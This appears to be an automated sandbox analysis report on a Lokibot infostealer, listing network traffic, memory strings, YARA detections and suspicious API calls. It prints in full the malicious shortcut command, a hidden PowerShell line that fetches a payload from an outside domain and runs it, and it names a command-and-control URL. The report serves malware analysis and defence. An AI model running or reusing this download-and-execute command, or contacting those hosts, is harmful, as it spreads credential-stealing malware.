Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:34 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:35 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:36 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:37 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:38 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:39 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:39 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:40 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:41 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:42 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:43 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:44 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: mjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mjtjewi.exe, 00000005.00000002.2638412976.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php
Source: mjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.phpy
Source: powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.coF
Source: powershell.exe, 00000000.00000002.1499571714.0000020C5BA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1499571714.0000020C5B93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: mjtjewi.exe, mjtjewi.exe, 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CEF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sodiumlaurethsulfatedesyroyer.com
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4C502000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1499571714.0000020C5BA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1499571714.0000020C5B93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CEEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp, Comprobante.lnk.lnk	String found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.11:49710 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

PE file contains section with special chars

Source: mjtjewi.exe.0.dr

Static PE information: section name: j1CM!e^U

PE file has nameless sections

Source: mjtjewi.exe.0.dr

Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Desktop\mjtjewi.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: Comprobante.lnk.lnk

LNK file: -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';

Contains functionality to call native functions

Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DBB0 NtResumeThread,	4_2_0AC9DBB0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DB59 NtResumeThread,	4_2_0AC9DB59
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9D9F8 NtReadVirtualMemory,	4_2_0AC9D9F8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DF28 NtSetContextThread,	4_2_0AC9DF28
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DDD0 NtWriteVirtualMemory,	4_2_0AC9DDD0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DBA8 NtResumeThread,	4_2_0AC9DBA8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9D9F0 NtReadVirtualMemory,	4_2_0AC9D9F0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DF21 NtSetContextThread,	4_2_0AC9DF21
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DDC9 NtWriteVirtualMemory,	4_2_0AC9DDC9

Detected potential crypto function

Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01522D20	4_2_01522D20
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152B5B8	4_2_0152B5B8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152B858	4_2_0152B858
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152D038	4_2_0152D038
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015224D8	4_2_015224D8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015208E1	4_2_015208E1
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01523760	4_2_01523760
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526F28	4_2_01526F28
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015246C0	4_2_015246C0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526D58	4_2_01526D58
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526D48	4_2_01526D48
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015245F1	4_2_015245F1
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015231E8	4_2_015231E8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152459F	4_2_0152459F
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526870	4_2_01526870
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01522462	4_2_01522462
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526862	4_2_01526862
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015218CF	4_2_015218CF
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152A668	4_2_0152A668
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526A90	4_2_01526A90
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526A80	4_2_01526A80
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF92E0	4_2_02DF92E0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF8392	4_2_02DF8392
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF7088	4_2_02DF7088
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF5520	4_2_02DF5520
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF7918	4_2_02DF7918
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF92B9	4_2_02DF92B9
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFA218	4_2_02DFA218
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFF218	4_2_02DFF218
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFA208	4_2_02DFA208
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF7358	4_2_02DF7358
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF0310	4_2_02DF0310
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF0320	4_2_02DF0320
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF7053	4_2_02DF7053
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFB611	4_2_02DFB611
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFB620	4_2_02DFB620
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF1778	4_2_02DF1778
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF176A	4_2_02DF176A
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFBA88	4_2_02DFBA88
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFB8B8	4_2_02DFB8B8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFB8A8	4_2_02DFB8A8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF19D8	4_2_02DF19D8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF19C8	4_2_02DF19C8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFAFF8	4_2_02DFAFF8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC90B88	4_2_0AC90B88
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9E081	4_2_0AC9E081
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9262E	4_2_0AC9262E
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9CDC0	4_2_0AC9CDC0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC90B78	4_2_0AC90B78
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC90040	4_2_0AC90040
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC90006	4_2_0AC90006
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC91FC8	4_2_0AC91FC8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC91FB8	4_2_0AC91FB8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9BC1A	4_2_0AC9BC1A
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9CD8E	4_2_0AC9CD8E
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AF50040	4_2_0AF50040
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AF50006	4_2_0AF50006
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 6_2_0040549C	6_2_0040549C
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 6_2_004029D4	6_2_004029D4

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: String function: 00405B6F appears 42 times

PE file contains executable resources (Code or Archives)

Source: mjtjewi.exe.0.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Yara signature match

Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
